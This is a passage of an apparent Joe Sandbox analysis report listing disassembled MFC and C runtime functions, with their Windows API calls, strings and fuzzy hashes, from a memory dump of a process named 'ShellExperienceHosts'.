Instruction Fuzzy Hash: 06318C31301647BFDB285F21D848AADBB79FF4A715F044126E96D86A90CB30A421DB94

Function 6C9BBFC1 Relevance: 9.1, APIs: 6, Instructions: 86windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 6C9BBFE2
GetWindow.USER32(?,00000005), ref: 6C9BBFF9
GetWindowRect.USER32(00000000,?), ref: 6C9BC014

Part of subcall function 6C9C7F02: ScreenToClient.USER32(?,00000800), ref: 6C9C7F11
Part of subcall function 6C9C7F02: ScreenToClient.USER32(?,00000808), ref: 6C9C7F1E

SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 6C9BC03A
GetWindow.USER32(00000000,00000002), ref: 6C9BC043
ScrollWindow.USER32(?,?,?,?,?), ref: 6C9BC05F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
Opcode ID: 5194abe0a1f8bbe0ac8a4b072731caa02e47359a88e17f1d1d20f9919b5d7164
Instruction ID: 1d842d98f8da9b3f691eb6eb7f68280d7a3172bfce76ad365ea3ea2a7361d547
Opcode Fuzzy Hash: 5194abe0a1f8bbe0ac8a4b072731caa02e47359a88e17f1d1d20f9919b5d7164
Instruction Fuzzy Hash: AF213936700609EFDF119F65C888AAF7BB9FF89718B154119F909A7610EB30ED158BA0

Function 6C9C08D6 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C9C08DD
UnpackDDElParam.USER32(000003E8,?,?,?), ref: 6C9C0915
GlobalLock.KERNEL32(?), ref: 6C9C091D
GlobalUnlock.KERNEL32(?), ref: 6C9C0951
ReuseDDElParam.USER32(?,000003E8,000003E4,00008000,?), ref: 6C9C0994
PostMessageW.USER32(?,000003E4,?,00000000), ref: 6C9C09A0

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: GlobalParam$H_prolog3_catchLockMessagePostReuseUnlockUnpack
String ID:
API String ID: 4045269880-0
Opcode ID: 366edcf1d2da8920b1bc6fa1c50a049fe0c30d57fc9d3fa8086e108cbccc2541
Instruction ID: fcfde387d6bedf2f23822e1d0d9b35cbb5e99a4989d5b96c67a114e08b3c0fc4
Opcode Fuzzy Hash: 366edcf1d2da8920b1bc6fa1c50a049fe0c30d57fc9d3fa8086e108cbccc2541
Instruction Fuzzy Hash: 51316D71A0028AEFEF05DBA4C994BFEB779EF24309F144118E40577691DB709E49CB62

Function 6C9DC29F Relevance: 9.1, APIs: 6, Instructions: 80windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9DC2A8

Part of subcall function 6C9C7012: __EH_prolog3.LIBCMT ref: 6C9C7019
Part of subcall function 6C9C7012: GetWindowDC.USER32(00000000,00000004,6C9E03E2,00000000), ref: 6C9C7045

GetClientRect.USER32(?,?), ref: 6C9DC2CA
GetWindowRect.USER32(?,?), ref: 6C9DC2DE

Part of subcall function 6C9C7F02: ScreenToClient.USER32(?,00000800), ref: 6C9C7F11
Part of subcall function 6C9C7F02: ScreenToClient.USER32(?,00000808), ref: 6C9C7F1E

OffsetRect.USER32(?,?,?), ref: 6C9DC2FF

Part of subcall function 6C9C7B10: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 6C9C7B47
Part of subcall function 6C9C7B10: ExcludeClipRect.GDI32(00000000,?,?,?,?), ref: 6C9C7B64

OffsetRect.USER32(?,?,?), ref: 6C9DC321

Part of subcall function 6C9C7C55: IntersectClipRect.GDI32(?,?,?,?,?), ref: 6C9C7C8C
Part of subcall function 6C9C7C55: IntersectClipRect.GDI32(00000000,?,?,?,?), ref: 6C9C7CA9

SendMessageW.USER32(?,00000014,?,00000000), ref: 6C9DC359

Part of subcall function 6C9C716B: ReleaseDC.USER32(?,00000000), ref: 6C9C719F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Rect$Clip$Client$ExcludeIntersectOffsetScreenWindow$H_prolog3H_prolog3_MessageReleaseSend
String ID:
API String ID: 3860140383-0
Opcode ID: fa5299df1bb7e8f320b1f853bd5c6d8729bcf77246c6b2c94c8db9fb84f9e7ea
Instruction ID: f5129ceb6d7aee698ccfb9cd3225055d6e280e60770e19b06e066067b87c4b1b
Opcode Fuzzy Hash: fa5299df1bb7e8f320b1f853bd5c6d8729bcf77246c6b2c94c8db9fb84f9e7ea
Instruction Fuzzy Hash: 57310672A1015DAFDF05DBA0D998DFEB778BF69304F140219F406A3650EB34AA09CB61

Function 6C9CE8A0 Relevance: 9.1, APIs: 6, Instructions: 71COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 6C9CE8D8
GetParent.USER32(?), ref: 6C9CE8E6
GetParent.USER32(?), ref: 6C9CE8FD
GetLastActivePopup.USER32(?), ref: 6C9CE910
IsWindowEnabled.USER32(?), ref: 6C9CE924
EnableWindow.USER32(?,00000000), ref: 6C9CE937

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 4dd43a4318595f4a6fee20340ea05b55c2230897a4f6bbc580c0c34c4bda4cee
Instruction ID: 9732d2a4cf6978c35cd13063ef85527feab97edf9c8876f8b13f094ecc1bbde7
Opcode Fuzzy Hash: 4dd43a4318595f4a6fee20340ea05b55c2230897a4f6bbc580c0c34c4bda4cee
Instruction Fuzzy Hash: C7110832B02B3197D7611A598886B5E36BC6F66F68F1502A5FC17E7A04CB20DC0047E3

Function 6CA440D1 Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6CA44166
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6CA4417C
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6CA44187
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6CA44192
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6CA4419D
Concurrency::details::ExternalContextBase::~ExternalContextBase.LIBCONCRT ref: 6CA441A8

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ContextExternal$BaseBase::~Concurrency::details::
String ID:
API String ID: 1690591649-0
Opcode ID: ceffae55715a238694c7c1722a672343cd1cf7aef892e3e8fcdfaa714e66b294
Instruction ID: 7de808efe8105792b62042c4d34d9ceab54324cbacadbd8767802e5e7706822b
Opcode Fuzzy Hash: ceffae55715a238694c7c1722a672343cd1cf7aef892e3e8fcdfaa714e66b294
Instruction Fuzzy Hash: FB215B32700941ABC708EF68D9A0BEEF765FB71618F404229D02A57B80DF75B95ACB91

Function 6CAF9BD2 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6CAF9A21,6CAF49AE,6CAF4C71,?,6CAF4EA7,?,00000001,?,?,00000001,?,6CB80F10,0000000C,6CAF4FA0), ref: 6CAF9BE0
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CAF9BEE
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CAF9C07
SetLastError.KERNEL32(00000000,6CAF4EA7,?,00000001,?,?,00000001,?,6CB80F10,0000000C,6CAF4FA0,?,00000001,?), ref: 6CAF9C59

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5c89bfda8a6f9f8efecce8ce7191444864d6c6e88e6a6f4a93eb3e49490c2e09
Instruction ID: a4eed7be4ae314f14adbdf7840347d8e381f5e822fa0926badad5683066fa5ea
Opcode Fuzzy Hash: 5c89bfda8a6f9f8efecce8ce7191444864d6c6e88e6a6f4a93eb3e49490c2e09
Instruction Fuzzy Hash: D001B53234E3215EAA140975AE94AD72AB9DB0337DB340329F134979D0EB714CCB5150

Function 6C9C24D8 Relevance: 9.1, APIs: 6, Instructions: 59COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 6C9C24E1
GetWindow.USER32(00000000), ref: 6C9C24E8
GetWindowLongW.USER32(00000000,000000F0), ref: 6C9C2516
ShowWindow.USER32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,6C9C1FF8,00000000,000000FF), ref: 6C9C2531
ShowWindow.USER32(00000000,00000004,?,?,?,?,?,?,?,?,?,?,6C9C1FF8,00000000,000000FF), ref: 6C9C2552
GetWindow.USER32(00000000,00000002), ref: 6C9C255F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Show$DesktopLong
String ID:
API String ID: 3178490500-0
Opcode ID: f66a565b3ed13ee87b3549345c27db00dab8f8b7a46754c79631925106420acf
Instruction ID: b926297e1e0c0ebd65c5176c232f1669157e6a4a9bb739813abc060502c34045
Opcode Fuzzy Hash: f66a565b3ed13ee87b3549345c27db00dab8f8b7a46754c79631925106420acf
Instruction Fuzzy Hash: 5F11E531306F95ABEB225A29DC1DB4F3A3CAF4276AF101332ED1496585CB34C401CA97

Function 6C9D1A55 Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 6C9D1A6E
GetDlgCtrlID.USER32(00000000), ref: 6C9D1A79
GetWindowLongW.USER32(00000000,000000F0), ref: 6C9D1A89
GetWindowRect.USER32(00000000,?), ref: 6C9D1AA2
PtInRect.USER32(?,?,?), ref: 6C9D1AB2
GetWindow.USER32(?,00000005), ref: 6C9D1ABF

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 55401f1ca2faf2ab5f188bb6c764dcdd40fd12c023c235eb60dc96accbdb378f
Instruction ID: 4625f2cb6effc39b048646c653f964be0a71d38acdfc300c1ae2d85e1e406ae5
Opcode Fuzzy Hash: 55401f1ca2faf2ab5f188bb6c764dcdd40fd12c023c235eb60dc96accbdb378f
Instruction Fuzzy Hash: AD01AD36B41659ABDB11DF648908EAE77BCEF07325F128255F805F7480EB30EA458BA1

Function 6C9E9982 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6C9E998C

Part of subcall function 6C9BE402: GetDlgCtrlID.USER32(?), ref: 6C9BE40D

Strings

MFCToolBars, xrefs: 6C9E999C
%TsMFCToolBar-%d%x, xrefs: 6C9E99F9
Buttons, xrefs: 6C9E9A82
%TsMFCToolBar-%d, xrefs: 6C9E99E1

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CtrlH_prolog3_catch
String ID: %TsMFCToolBar-%d$%TsMFCToolBar-%d%x$Buttons$MFCToolBars
API String ID: 3893142374-3577816979
Opcode ID: 334b9fc878fb66bbd2d3ee9795da8358abf498ed1751bc87010856a3d2f86429
Instruction ID: 2b0ce14b097aeb4f6ea3865a95d5d4e213835c0d262b5e9704d5cce9a807d403
Opcode Fuzzy Hash: 334b9fc878fb66bbd2d3ee9795da8358abf498ed1751bc87010856a3d2f86429
Instruction Fuzzy Hash: 19917A34A00249DFCF01DFA4D984AEDB7BABF98314F154069E90AAB791CB30AD45DF21

Function 6C9BA7A1 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 215windowCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9D2379: __EH_prolog3.LIBCMT ref: 6C9D2380

SendMessageW.USER32(?,00000433,00000000,?), ref: 6C9BA979
GetWindowLongW.USER32(?,000000FC), ref: 6C9BA984
GetWindowLongW.USER32(?,000000FC), ref: 6C9BA998
SetWindowLongW.USER32(?,000000FC,00000000), ref: 6C9BA9C1

Strings

,, xrefs: 6C9BA961

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: LongWindow$H_prolog3MessageSend
String ID: ,
API String ID: 4140968126-3772416878
Opcode ID: 49615ab9b6cf0e58de27752dcb354ee80d1ed2a2bd2fee2b890581db1af89690
Instruction ID: 3fc483804e0baa8fc34202a86391925342cf6d8f2ee946f6cc24425ab3fcf834
Opcode Fuzzy Hash: 49615ab9b6cf0e58de27752dcb354ee80d1ed2a2bd2fee2b890581db1af89690
Instruction Fuzzy Hash: F171C131700605ABDF059F74D884AAEBBB9BF58314F11016AE806A7B80DF30EC05DB91

Function 6C9A2B90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6C9A2C1A
__Getctype.LIBCPMT ref: 6C9A2C83
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6C9A2CB7
std::_Lockit::~_Lockit.LIBCPMT ref: 6C9A2D4C

Strings

bad locale name, xrefs: 6C9A2D69

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_dtorLockit::_Lockit::~_
String ID: bad locale name
API String ID: 3327844093-1405518554
Opcode ID: e9c6c40e7d81efb37fb3f47e5b0b847ef21dd8c34a74a6f473d55ab0293e2311
Instruction ID: dc1299c54be14af2e419eca0236af6e6a03f4cb8782d48d7674487ab4773e204
Opcode Fuzzy Hash: e9c6c40e7d81efb37fb3f47e5b0b847ef21dd8c34a74a6f473d55ab0293e2311
Instruction Fuzzy Hash: 71516FF1C01648ABEB00CFE5D945BCEBBB8AF14318F144165E828AB781E774D549CBA1

Function 6CA08123 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6CA0812D
CloseHandle.KERNEL32(?,?,?,00000080,6CA67C92,?,00000000,?,?,00000000,?,00000000), ref: 6CA08168

Part of subcall function 6C9D70E1: __EH_prolog3.LIBCMT ref: 6C9D70E8

GetTempPathW.KERNEL32(00000104,00000000,00000104,?,?,00000080,6CA67C92,?,00000000,?,?,00000000,?,00000000), ref: 6CA08189
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,000000FF,?,?,00000000,?,00000000), ref: 6CA081DE

Strings

AFX, xrefs: 6CA081B3

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CloseCreateFileH_prolog3H_prolog3_catchHandlePathTemp
String ID: AFX
API String ID: 775233504-1300893600
Opcode ID: c3007a2323b1e33f45caf982fd5033c158553b444c58156ab638c7d27f3221e4
Instruction ID: b2c7892051409fa96ac64fdef5d9b3da79b28a555ceed0d428cf35c91ce7f80e
Opcode Fuzzy Hash: c3007a2323b1e33f45caf982fd5033c158553b444c58156ab638c7d27f3221e4
Instruction Fuzzy Hash: A1417B70A00119EBDB05DFA4DC90FEEB7B8AF39318F104169E416B76D1DB70AA49CB64

Function 6C9C2572 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6C9C257C

Part of subcall function 6C9BE4F7: GetWindowLongW.USER32(00000004,000000F0), ref: 6C9BE504

swprintf.LIBCMT ref: 6C9C25D1
swprintf.LIBCMT ref: 6C9C2675

Strings

:%d, xrefs: 6C9C25C6, 6C9C2667
- , xrefs: 6C9C25F2, 6C9C25F7, 6C9C25FF, 6C9C262F, 6C9C2634, 6C9C263C

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: swprintf$H_prolog3_LongWindow
String ID: - $:%d
API String ID: 524023746-2359489159
Opcode ID: 3fd0a14aca81a66bba82533f5e3ef3afb5ab70f8f44d99f1d2f3be1f0620b5f5
Instruction ID: cf805674054828029c5b9e5249366c201485ba56bd10ceaa386a15d7ae966efd
Opcode Fuzzy Hash: 3fd0a14aca81a66bba82533f5e3ef3afb5ab70f8f44d99f1d2f3be1f0620b5f5
Instruction Fuzzy Hash: 19319072A011556AD714E6A0CD45FFFB36DAF24308F041495E50DA7A42EB30EF498BA5

Function 6C9B7EB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__snprintf_s.LIBCMT ref: 6C9B7F04
__snprintf_s.LIBCMT ref: 6C9B7F38
GetClassInfoW.USER32(?,0000007C,FFFFFDFF), ref: 6C9B7F68

Strings

Afx:%p:%x, xrefs: 6C9B7EF8
Afx:%p:%x:%p:%p:%p, xrefs: 6C9B7F2E

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: __snprintf_s$ClassInfo
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 1341824228-2801496823
Opcode ID: 1981df80aa79c57cdade4fa608e0c5cf84321cf28d8e3c222f42caf13c8893ea
Instruction ID: c031f0c23be6404bc1a8c454337ad35b0c7d40e61fba8be295e6505494977d4f
Opcode Fuzzy Hash: 1981df80aa79c57cdade4fa608e0c5cf84321cf28d8e3c222f42caf13c8893ea
Instruction Fuzzy Hash: 63311A74A00249AFDB019F69C840ACF7BB8FF68319F009566E904BB750D774DA54CFA5

Function 6CA40016 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 90COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CA4001D

Part of subcall function 6C9BE402: GetDlgCtrlID.USER32(?), ref: 6C9BE40D

Strings

IsVisible, xrefs: 6CA400D5
%TsBasePane-%d%x, xrefs: 6CA4007E
%TsBasePane-%d, xrefs: 6CA40067
BasePanes, xrefs: 6CA4002A

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
